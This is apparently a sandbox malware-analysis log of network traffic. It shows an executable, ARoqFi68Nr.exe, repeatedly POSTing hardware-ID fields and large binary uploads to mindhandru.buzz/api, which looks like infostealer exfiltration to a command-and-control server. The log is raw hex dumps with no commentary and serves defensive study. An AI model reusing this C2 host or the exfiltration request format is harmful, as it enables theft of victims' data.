                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 30 58 6f 32 61 61 75 77 32 44 30 6e 76 73 52 58 57 6c 77 4e 57 6e 6d 30 62 65 4f 56 6a 33 66 66 4f 65 30 43 6c 53 43 75 57 6a 50 6b 5a 72 5a 5a 6d 2f 7a 59 56 47 74 47 2f 46 2f 71 66 45 67 43 43 58 56 59 70 34 7a 57 57 6f 72 63 73 51 4b 56 63 4b 35 61 4d 77 78 6d 37 6b 6c 50 71 49 42 42 4c 6c 50 49 63 7a 74 42 4e 56 72 38 53 52 7a 76 36 65 70 4b 2b 79 53 4a 59 75 33 6f 72 78 64 72 72 44 71 36 48 64 2b 51 39 43 44 57 61 36 6b 2b 4b 77 6b 64 45 30 30 30 56 4a 39 55 33 33 61 36 33 4f 6a 6d 37 42 48 32 4f 6c 4c 35 51 37 59 4d 38 73 58 46 65 43 4d 69 67 48 64 75 47 46 6c 47 2f 62 48 49 75 34 48 36 4e 71 4f 42 74 51 4f 77 45 5a 49 36 55 31 56 36 6b 6c 6d 66 34 4a 78 51 62 33 66 49 6b 6c 74 41 4e 56 74 6b 53 59 44 76 6b 64 35 71 35 35 69 38 6e 74 45 35 73 33 73
                                                                                              Data Ascii: 0Xo2aauw2D0nvsRXWlwNWnm0beOVj3ffOe0ClSCuWjPkZrZZm/zYVGtG/F/qfEgCCXVYp4zWWorcsQKVcK5aMwxm7klPqIBBLlPIcztBNVr8SRzv6epK+ySJYu3orxdrrDq6Hd+Q9CDWa6k+KwkdE000VJ9U33a63Ojm7BH2OlL5Q7YM8sXFeCMigHduGFlG/bHIu4H6NqOBtQOwEZI6U1V6klmf4JxQb3fIkltANVtkSYDvkd5q55i8ntE5s3s
                                                                                              2024-12-27 07:52:48 UTC938INData Raw: 6e 6a 44 6e 4f 68 6b 4d 79 71 51 41 6c 4a 67 57 44 4a 74 73 61 78 50 6d 66 35 71 31 38 47 51 6d 67 67 51 6c 6a 73 4f 73 52 70 54 52 4e 4b 6b 4f 56 30 76 43 38 6b 4f 59 70 52 59 59 6a 31 56 44 4b 61 64 52 76 70 58 4e 49 43 79 6c 55 53 6e 36 79 2f 77 50 70 70 78 77 71 58 39 5a 44 5a 72 71 53 35 62 51 45 51 66 42 43 67 56 71 73 53 7a 4f 2b 4b 63 77 48 2b 78 64 4b 39 69 4d 74 45 7a 6a 30 57 36 70 61 56 6c 4d 32 61 41 4a 33 70 4d 44 46 63 5a 73 61 78 2f 6b 66 70 79 35 35 33 55 50 6e 48 70 2b 7a 63 4c 69 47 62 75 41 50 4b 64 78 46 6b 75 43 69 31 75 51 30 43 70 59 77 55 6f 56 59 4b 70 4d 6e 71 48 35 5a 52 61 7a 43 55 7a 41 79 2b 30 49 76 59 5a 7a 71 58 39 5a 44 5a 72 71 53 5a 62 51 45 51 66 42 43 67 56 71 73 53 7a 4f 2b 4b 63 77 48 2b 78 64 4b 39 69 4d 74 45 7a
                                                                                              Data Ascii: njDnOhkMyqQAlJgWDJtsaxPmf5q18GQmggQljsOsRpTRNKkOV0vC8kOYpRYYj1VDKadRvpXNICylUSn6y/wPppxwqX9ZDZrqS5bQEQfBCgVqsSzO+KcwH+xdK9iMtEzj0W6paVlM2aAJ3pMDFcZsax/kfpy553UPnHp+zcLiGbuAPKdxFkuCi1uQ0CpYwUoVYKpMnqH5ZRazCUzAy+0IvYZzqX9ZDZrqSZbQEQfBCgVqsSzO+KcwH+xdK9iMtEz
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 32 34 37 30 0d 0a 58 76 58 52 4f 2b 6f 6a 43 77 33 5a 70 42 69 66 72 69 73 77 67 6c 56 54 4f 2b 52 75 6a 4f 33 59 59 51 75 75 53 47 7a 59 38 74 49 4c 72 70 39 79 37 69 63 49 53 35 54 79 46 4a 6a 49 4c 46 61 51 57 46 4a 30 6f 6a 57 4d 76 50 6c 70 46 71 55 45 56 49 43 4d 39 46 37 31 30 55 6e 71 50 78 63 4d 7a 4b 4e 57 2f 70 4d 53 45 49 4a 63 51 69 6d 71 4e 39 32 70 74 7a 70 53 37 41 52 76 33 34 79 30 54 76 2f 4b 4b 62 70 6d 53 56 6e 46 2f 41 4b 59 68 6c 56 4f 30 68 77 56 4b 71 6f 68 33 65 6a 35 62 77 47 68 53 6d 6a 63 33 75 6f 64 75 35 49 37 31 77 38 38 42 74 65 33 46 64 2b 75 4b 7a 65 4c 51 6c 67 33 37 55 65 6a 6d 4f 5a 6c 45 4f 42 69 61 4e 6a 50 72 46 44 74 69 54 79 78 63 54 67 42 79 72 38 55 33 39 42 62 56 6f 55 53 44 58 6a 50 64 4a 43 71 2b 57 56 43 67
                                                                                              Data Ascii: 2470XvXRO+ojCw3ZpBifriswglVTO+RujO3YYQuuSGzY8tILrp9y7icIS5TyFJjILFaQWFJ0ojWMvPlpFqUEVICM9F710UnqPxcMzKNW/pMSEIJcQimqN92ptzpS7ARv34y0Tv/KKbpmSVnF/AKYhlVO0hwVKqoh3ej5bwGhSmjc3uodu5I71w88Bte3Fd+uKzeLQlg37UejmOZlEOBiaNjPrFDtiTyxcTgByr8U39BbVoUSDXjPdJCq+WVCg


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.749703104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:52:50 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=Y8OKL05051W3WH
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 12826
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:52:50 UTC12826OUTData Raw: 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 38
                                                                                              Data Ascii: --Y8OKL05051W3WHContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--Y8OKL05051W3WHContent-Disposition: form-data; name="pid"2--Y8OKL05051W3WHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--Y8
                                                                                              2024-12-27 07:52:51 UTC1130INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=ripduno08ivlruh1oeqf5000h3; expires=Tue, 22 Apr 2025 01:39:29 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVf9W20HRS%2BoQaIJngGcL4h9%2F6fJpOE8EcCFFbsAXyJysI%2BKCzG3ZHrtLVnSPbgG25WzYjjqg7Hdv8BmZhbIHQ3JrOIC5uA8Esa7Cfu4nOMqQxH%2BgBzUy1yrB75ZgR5OMPw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bbc2fb7c4244-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1779&rtt_var=670&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13761&delivery_rate=1628555&cwnd=221&unsent_bytes=0&cid=688fc66d2cb66f40&ts=1047&x=0"
                                                                                              2024-12-27 07:52:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 07:52:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.749709104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:52:52 UTC273OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=DTLPDGVYJ7
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 15034
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:52:52 UTC15034OUTData Raw: 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f
                                                                                              Data Ascii: --DTLPDGVYJ7Content-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--DTLPDGVYJ7Content-Disposition: form-data; name="pid"2--DTLPDGVYJ7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DTLPDGVYJ7Co
                                                                                              2024-12-27 07:52:59 UTC1132INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:59 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=bnjrnf5q1mt5e0dtaer0pbd5ph; expires=Tue, 22 Apr 2025 01:39:38 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etiK9x4JKmMfvd5oLC8VP8ecgLhYumu3mm3IkkAPbSx%2FLGH5ksTPgiC%2BS9UU6p1S5DwflqBdQ5DRITHbjN8kS15clh3IR%2Bf6kOqGiQxuLjUlZXx70O%2BWmSW%2FSwavA5Zp3A0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bbd27ba87ca2-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1824&rtt_var=719&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15965&delivery_rate=1486761&cwnd=239&unsent_bytes=0&cid=7de0a82e11f6e4a1&ts=7264&x=0"
                                                                                              2024-12-27 07:52:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 07:52:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.749733104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:53:01 UTC273OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=EGAS4F6GYU
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20359
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:53:01 UTC15331OUTData Raw: 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f
                                                                                              Data Ascii: --EGAS4F6GYUContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--EGAS4F6GYUContent-Disposition: form-data; name="pid"3--EGAS4F6GYUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--EGAS4F6GYUCo
                                                                                              2024-12-27 07:53:01 UTC5028OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                              2024-12-27 07:53:02 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:53:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=b7ks6jhkimvom3bbldeffj2sjn; expires=Tue, 22 Apr 2025 01:39:41 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OM9uNSatQ7VrNja53aaTgICAlPPLNPa%2FzGyyUvHD2SJEodyGBiIW8XfzJTrdrII%2FIV%2FL9fxPfLUAxPluXCJy10Q%2FFFMv9wAqPjMHk6HevXmfWwLhA%2Fj7F8gyiRFp%2FQxvkk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bc09af2d72bc-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1820&rtt_var=690&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21312&delivery_rate=1576673&cwnd=252&unsent_bytes=0&cid=fad7608808e9d5c7&ts=976&x=0"
                                                                                              2024-12-27 07:53:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 07:53:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.749741104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:53:04 UTC280OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=0AWTW7811TE3B9RAFW
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1228
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:53:04 UTC1228OUTData Raw: 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                              Data Ascii: --0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="pid"1--0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                              2024-12-27 07:53:05 UTC1123INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:53:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1n9r419smjuouv8agoigovs3p5; expires=Tue, 22 Apr 2025 01:39:43 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65ieToEKXPL9zJbmytizztKNsD6Tg4wRzdWXxPbsw2MhlTAua4UeGpDmo1wxdYj5rJSffzNbmekE5VQtNsEltUUpSrwvwUKpA%2FHbPq0SuDs5J%2BxRbScZI3P1KXBefct8CTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bc1afbb343d9-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2328&rtt_var=1011&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2144&delivery_rate=1254295&cwnd=221&unsent_bytes=0&cid=c2b2d52b29d8db38&ts=762&x=0"
                                                                                              2024-12-27 07:53:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 07:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.749748104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:53:06 UTC278OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=OQWBW0WO8U7KNW
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 550868
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 51
                                                                                              Data Ascii: --OQWBW0WO8U7KNWContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--OQWBW0WO8U7KNWContent-Disposition: form-data; name="pid"1--OQWBW0WO8U7KNWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OQ
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: db a4 c3 8f 36 24 6e b4 63 e5 a2 02 85 c4 e4 a5 11 89 25 cd a9 37 8b c0 67 0f d5 00 19 80 03 93 bd 48 f6 86 df 50 f0 ae 84 d5 1b 7a 79 08 4a 7d 54 f8 13 f5 27 5b 0d c1 6d a6 1b 39 82 f3 ef 12 35 31 71 88 ad f7 42 c9 a7 99 28 92 6b 97 e2 11 c6 43 5a dd 18 b2 3e 9d 11 46 46 87 4f 96 8d 61 56 cd 1a 14 a9 c4 e1 a1 ba 81 a4 31 66 42 5b 02 c7 33 ed ca 82 83 29 9d 9f a3 83 4c 14 a6 e8 a2 f8 a1 ef e8 68 d1 7b 46 db 17 51 30 0d 1a 5b dc 2e 4a dd 41 4d ab 0f 39 2a 40 78 07 12 03 f7 f0 a0 6d f4 f4 bf c6 14 5d 9c 0f 1f 95 06 5d f3 da c0 4e 5b cf 19 d1 30 89 12 29 5e 0a 00 91 fd b4 3f 7c 37 49 c7 a2 28 25 d5 c4 48 15 7b c6 3c 4b 84 3a bd aa c4 e4 45 eb 90 3b e8 60 1c e2 09 44 31 a5 17 1a 25 5f 2e a0 65 7f 4c a2 e1 bf 4e a8 72 da 54 b3 78 7c 2d e6 63 b0 76 69 93 0f 53
                                                                                              Data Ascii: 6$nc%7gHPzyJ}T'[m951qB(kCZ>FFOaV1fB[3)Lh{FQ0[.JAM9*@xm]]N[0)^?|7I(%H{<K:E;`D1%_.eLNrTx|-cviS
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 22 23 a4 d3 2d 10 77 98 1d 03 51 22 bd 33 20 a4 13 89 56 2c 73 9d a2 63 0b eb 88 2e 22 cc 9e 1f f7 af 2f bd 95 5a 56 b4 66 90 7b 8f 2f e2 dc c1 60 bb 73 4a 90 90 80 cc 70 27 35 32 f4 c2 97 b9 42 44 74 06 1a 05 81 b2 33 7b f3 34 70 04 21 92 1b 46 4a d8 59 82 aa 07 e7 d9 00 a9 70 f8 ed b2 5b 8e af 80 51 56 ef 19 05 0d 85 8b e7 86 ce bc f1 5a de be 72 6a b8 f4 c1 4c d9 0d 33 fd 81 bc 97 9c b0 9d 96 b9 3b 08 dd fb d9 6f 90 73 7f af 6f 3d fe 1c c6 e4 ee 49 d4 e8 27 6f 2e ac 9c c3 01 86 cb 6b 6e 2d a3 b9 75 7a 28 b0 dc 68 b6 14 d5 44 25 0d 33 10 cc 83 3d fe bc 3a 74 e8 97 ab 51 9a 7d 5f 40 a8 e3 40 8b d8 f3 d1 b6 ba e8 ef 42 c9 33 55 fa 09 7c 6f b4 2c 33 aa ff 45 87 5f d5 74 74 df f8 2e 1d ba 5e ae 8b 75 55 28 8e e4 73 64 56 46 bf 5f b3 72 e6 be 3a ab 31 86 7b
                                                                                              Data Ascii: "#-wQ"3 V,sc."/ZVf{/`sJp'52BDt3{4p!FJYp[QVZrjL3;oso=I'o.kn-uz(hD%3=:tQ}_@@B3U|o,3E_tt.^uU(sdVF_r:1{
